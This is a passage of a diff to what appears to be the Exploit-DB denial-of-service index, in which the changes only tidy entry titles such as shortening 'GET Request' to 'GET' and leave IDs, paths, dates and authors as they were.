-2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 +2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - (APPE) Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",windows,dos,0 @@ -544,7 +544,7 @@ id,file,description,date,author,platform,type,port 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 -3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Request Denial of Service",2007-04-12,shinnai,windows,dos,0 +3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Denial of Service",2007-04-12,shinnai,windows,dos,0 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,multiple,dos,0 3768,platforms/windows/dos/3768.pl,"Winamp 5.3 - '.wmv' Remote Denial of Service",2007-04-19,WiLdBoY,windows,dos,0 3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)",2007-04-20,mu-b,linux,dos,0 @@ -613,7 +613,7 @@ id,file,description,date,author,platform,type,port 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 (Windows Release) - Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows Explorer - '.GIF' Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 -4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0 +4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - POST Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0 4227,platforms/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash",2007-07-31,tenkei_ev,multiple,dos,0 4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,windows,dos,0 @@ -988,7 +988,7 @@ id,file,description,date,author,platform,type,port 8325,platforms/windows/dos/8325.py,"Apple Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (Denial of Service / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",windows,dos,0 -8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0 +8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 @@ -1057,8 +1057,8 @@ id,file,description,date,author,platform,type,port 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0 -8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0 -8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - GET Request Remote Denial of Service",2009-05-18,Stack,windows,dos,0 +8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0 +8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - GET Remote Denial of Service",2009-05-18,Stack,windows,dos,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,windows,dos,0 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié",windows,dos,0 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox - (unclamped loop) Denial of Service",2009-05-26,"Thierry Zoller",multiple,dos,0 @@ -1085,7 +1085,7 @@ id,file,description,date,author,platform,type,port 9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)",2009-06-29,Trancer,windows,dos,0 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)",2009-06-29,hack4love,windows,dos,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - '.m3u' Local Buffer Overflow (PoC)",2009-07-01,"ThE g0bL!N",windows,dos,0 -9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 +9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,multiple,dos,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,multiple,dos,0 @@ -1190,7 +1190,7 @@ id,file,description,date,author,platform,type,port 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0 -9621,platforms/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Request Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 +9621,platforms/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,windows,dos,0 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 @@ -1581,7 +1581,7 @@ id,file,description,date,author,platform,type,port 15498,platforms/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit (PoC)",2010-06-08,"Dillon Beresford",hardware,dos,80 13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80 -13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 +13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - Mobile Office Suite '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 @@ -1785,7 +1785,7 @@ id,file,description,date,author,platform,type,port 15418,platforms/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption",2010-11-04,Unknown,windows,dos,0 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption",2010-11-04,scup,windows,dos,0 15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local Denial of Service (PoC)",2010-11-04,"Nikita Tarakanov",windows,dos,0 -15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Request Denial of Service",2010-11-05,wingthor,windows,dos,0 +15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Denial of Service",2010-11-05,wingthor,windows,dos,0 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 @@ -2353,7 +2353,7 @@ id,file,description,date,author,platform,type,port 19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)",2012-07-12,"Adi Cohen",windows,dos,0 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",multiple,dos,0 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos,0 -19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0 +19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Exploit",1999-08-25,"ISS X-Force",windows,dos,0 19799,platforms/windows/dos/19799.txt,"Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0 19807,platforms/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos,0 @@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",multiple,dos,0 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0 -20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0 +20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0 20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0 @@ -2622,7 +2622,7 @@ id,file,description,date,author,platform,type,port 21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6 / Outlook 2000/2002/5.5 / Word 2000/2002 - VBScript ActiveX Word Object Denial of Service",2002-04-08,"Elia Florio",windows,dos,0 21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - Denial of Service Device Denial of Service",2002-04-24,ERRor,windows,dos,0 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 -21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Request Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0 +21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0 21388,platforms/windows/dos/21388.c,"Microsoft Windows Server 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0 21389,platforms/windows/dos/21389.txt,"Microsoft Windows Server 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos,0 @@ -2661,7 +2661,7 @@ id,file,description,date,author,platform,type,port 21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0 21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0 21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/2.4.19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0 -21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0 +21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0 21612,platforms/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos,0 21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin - Denial of Service",2002-07-16,"Lucas Lundgren",cgi,dos,0 21632,platforms/unix/dos/21632.c,"PHP Interpreter 3.0.x/4.0.x/4.1/4.2 - Direct Invocation Denial of Service",2002-07-22,"Matthew Murphy",unix,dos,0 @@ -2690,7 +2690,7 @@ id,file,description,date,author,platform,type,port 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link - Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 21792,platforms/windows/dos/21792.txt,"Savant Web Server 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0 -21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 - Long GET Request Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0 +21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 - GET Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0 21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos,0 21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0 21819,platforms/windows/dos/21819.c,"Trillian 0.74 - IRC Raw Messages Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 @@ -2708,7 +2708,7 @@ id,file,description,date,author,platform,type,port 21911,platforms/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool - Denial of Service",2002-10-06,@stake,multiple,dos,0 21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block Denial of Service",2002-10-08,"Yiming Gong",windows,dos,0 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta",windows,dos,0 -21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 +21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - GET Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0 21939,platforms/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,hardware,dos,0 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 - ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos,0 @@ -2725,7 +2725,7 @@ id,file,description,date,author,platform,type,port 21973,platforms/windows/dos/21973.pl,"SmartMail Server 1.0 Beta 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos,0 21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service",2002-11-01,"Jeep 94",hardware,dos,0 21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service",2002-11-01,"Mark Litchfield",hardware,dos,0 -21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service",2002-11-02,anonymous,windows,dos,0 +21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos,0 21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0 21984,platforms/unix/dos/21984.c,"QNX 6.1 - TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0 21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0 @@ -2742,7 +2742,7 @@ id,file,description,date,author,platform,type,port 22059,platforms/linux/dos/22059.pl,"Pserv 2.0 - HTTP Request Parsing Buffer Overflow",2002-11-01,"Matthew Murphy",linux,dos,0 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0 -22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 +22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 @@ -2808,7 +2808,7 @@ id,file,description,date,author,platform,type,port 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0 -22407,platforms/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 +22407,platforms/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",hardware,dos,0 22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",windows,dos,0 22419,platforms/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",php,dos,0 @@ -2835,7 +2835,7 @@ id,file,description,date,author,platform,type,port 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0 22518,platforms/windows/dos/22518.html,"Microsoft 'Shlwapi.dll' 6.0.2800.1106 - Malformed HTML Form Tag Denial of Service",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 -22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - Multiple GET Request Denial of Service",2003-04-24,"Positive Technologies",multiple,dos,0 +22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service",2003-04-24,"Positive Technologies",multiple,dos,0 22536,platforms/multiple/dos/22536.txt,"Opera 7.10 - Permanent Denial of Service",2003-04-24,"David F. Madrid",multiple,dos,0 22537,platforms/linux/dos/22537.c,"Libopt.a 3.1x - Error Logging Buffer Overflow (1)",2003-04-24,kf,linux,dos,0 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 @@ -2851,12 +2851,12 @@ id,file,description,date,author,platform,type,port 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0 -22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 +22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos,0 22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos,0 -22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow",2003-05-16,euronymous,windows,dos,0 +22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Buffer Overflow",2003-05-16,euronymous,windows,dos,0 22619,platforms/linux/dos/22619.txt,"CUPS 1.1.x - Cupsd Request Method Denial of Service",2003-05-20,"Phil D'Amore",linux,dos,0 22621,platforms/windows/dos/22621.txt,"Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow",2003-05-20,"David F. Madrid",windows,dos,0 22624,platforms/linux/dos/22624.c,"BZFlag 1.7 g0 - Reconnect Denial of Service",2003-05-21,"russian code molester",linux,dos,0 @@ -2887,14 +2887,14 @@ id,file,description,date,author,platform,type,port 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 22739,platforms/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,hardware,dos,0 22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",novell,dos,0 -22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - Multiple GET Requests Denial of Service",2003-06-11,posidron,windows,dos,0 -22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Request Denial of Service",2003-06-12,"Ziv Kamir",windows,dos,0 +22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service",2003-06-11,posidron,windows,dos,0 +22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Denial of Service",2003-06-12,"Ziv Kamir",windows,dos,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 22780,platforms/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",windows,dos,0 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 -22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long GET Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 +22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - GET Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",linux,dos,0 22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 22800,platforms/linux/dos/22800.txt,"Kerio MailServer 5.6.3 subscribe Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 @@ -2906,7 +2906,7 @@ id,file,description,date,author,platform,type,port 22817,platforms/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service",2003-06-23,eip,windows,dos,0 22822,platforms/windows/dos/22822.txt,"Compaq Web-Based Management Agent - Remote Stack Overflow Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 22823,platforms/windows/dos/22823.txt,"Compaq Web-Based Management Agent - Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 -22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - Remote GET Request Denial of 